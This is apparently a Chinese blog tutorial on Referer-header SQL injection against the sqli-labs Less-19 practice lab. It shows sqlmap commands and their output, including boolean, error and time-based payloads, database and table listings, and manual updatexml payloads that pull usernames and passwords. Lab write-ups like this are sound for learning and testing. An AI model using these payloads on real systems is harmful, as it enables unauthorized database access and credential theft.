Sqlmap2021 -- Referer注入

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: Sqlmap2021 -- Referer注入

一、检测是否存在注入

1、通过BurpSuite抓包,将封包内容保存到referer.txt

POST /sqli/Less-19/ HTTP/1.1

Host: 192.168.139.129

Content-Length: 38

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.139.129

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/sqli/Less-19/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

uname=admin&passwd=admin&submit=Submit

2、检测是否存在注入

sqlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3

--level 3:3级以上才会检测请求头信息

0a2653c851af460fa595bd959398a8f1.png

运行结果:

parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 6329 HTTP(s) requests:

---

Parameter: Referer (Referer)

   Type: boolean-based blind

   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE (SELECT (CASE WHEN (5183=5183) THEN 0x687474703a2f2f3139322e3136382e3133392e3132392f73716c692f4c6573732d31392f ELSE 0x28 END)) AND 'qIKO'='qIKO

   Type: error-based

   Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

   Payload: http://192.168.139.129/sqli/Less-19/' AND EXTRACTVALUE(1237,CONCAT(0x5c,0x7171717671,(SELECT (ELT(1237=1237,1))),0x7171787871)) AND 'fmnH'='fmnH

   Type: time-based blind

   Title: MySQL >= 5.0.12 RLIKE time-based blind

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE SLEEP(5) AND 'JGUO'='JGUO

---

[17:46:44] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP 5.4.45

back-end DBMS: MySQL >= 5.1

[17:46:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名字

qlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3 --dbs

0eacb84100b54626af849e6b562bf92a.png

运行结果:

[16:47:27] [INFO] retrieved: pikachu

[16:47:48] [INFO] retrieved:

[16:47:49] [INFO] retrieved: security

[16:48:13] [INFO] retrieved:

[16:48:13] [INFO] retrieved: sys

[16:48:24] [INFO] retrieved:

[16:48:24] [INFO] retrieved: www_dgdg_com

[16:49:13] [INFO] retrieved:

[16:49:14] [INFO] retrieved: www_zm_com

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[16:49:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3 -D security --tables

2d65d23f6d4748949b924e4057485923.png

运行结果:

parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 17409 HTTP(s) requests:

---

Parameter: Referer (Referer)

   Type: boolean-based blind

   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE (SELECT (CASE WHEN (7519=7519) THEN 0x687474703a2f2f3139322e3136382e3133392e3132392f73716c692f4c6573732d31392f ELSE 0x28 END)) AND 'jkuO'='jkuO

   Type: error-based

   Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

   Payload: http://192.168.139.129/sqli/Less-19/' AND EXTRACTVALUE(6597,CONCAT(0x5c,0x7178627071,(SELECT (ELT(6597=6597,1))),0x7176767071)) AND 'Czdo'='Czdo

   Type: time-based blind

   Title: MySQL >= 5.0.12 RLIKE time-based blind

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE SLEEP(5) AND 'zQQA'='zQQA

---

[08:54:30] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.1

[08:54:30] [INFO] fetching tables for database: 'security'

[08:54:30] [WARNING] the SQL query provided does not return any output

[08:54:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[08:54:30] [WARNING] the SQL query provided does not return any output

[08:54:30] [INFO] fetching number of tables for database 'security'

[08:54:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval                                                        

[08:54:30] [INFO] retrieved: 4

[08:54:30] [INFO] retrieved: emails

[08:54:30] [INFO] retrieved: referers

[08:54:31] [INFO] retrieved: uagents

[08:54:31] [INFO] retrieved: users

Database: security

[4 tables]

+----------+

| emails   |

| referers |

| uagents  |

| users    |

+----------+

[08:54:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

四、手动测试

1、sqlmap -r /home/aiyou/桌面/referer1.txt --referer=" http://192.168.139.129/sqli/Less-19/" --level 3  -D security -T users --columns

这里跑不出来了,大家可以继续手动测试一下。。。

2、手动测试获取字段

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' and table_schema = database() limit 3,1),0x7e),1) and '1'='1

3、手动测试获取字段内容

1' and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 0,1),0x7e),1) and '1'='1

2e9b90b2ca334476abebe75bafe6eeaa.png

禁止非法,后果自负

相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
7月前
|
安全 关系型数据库 MySQL
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
381 1
|
7月前
|
Go
12、报错注入(Post)
12、报错注入(Post)
37 0
|
2月前
|
SQL 关系型数据库 MySQL
|
7月前
|
关系型数据库 MySQL 应用服务中间件
Sqlmap -- POST注入
Sqlmap -- POST注入
106 2
|
7月前
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
|
7月前
|
数据库
Sqlmap是如何GET注入的
Sqlmap是如何GET注入的
58 0
|
7月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
118 0
|
7月前
|
Web App开发 数据安全/隐私保护 iOS开发
注入工具 -- sqlmap(设置请求参数)
注入工具 -- sqlmap(设置请求参数)
87 0
|
7月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
56 0
|
SQL 安全 网络安全
Sqlmap学习 -- Tamper绕过脚本
Sqlmap学习 -- Tamper绕过脚本
1050 0

热门文章

最新文章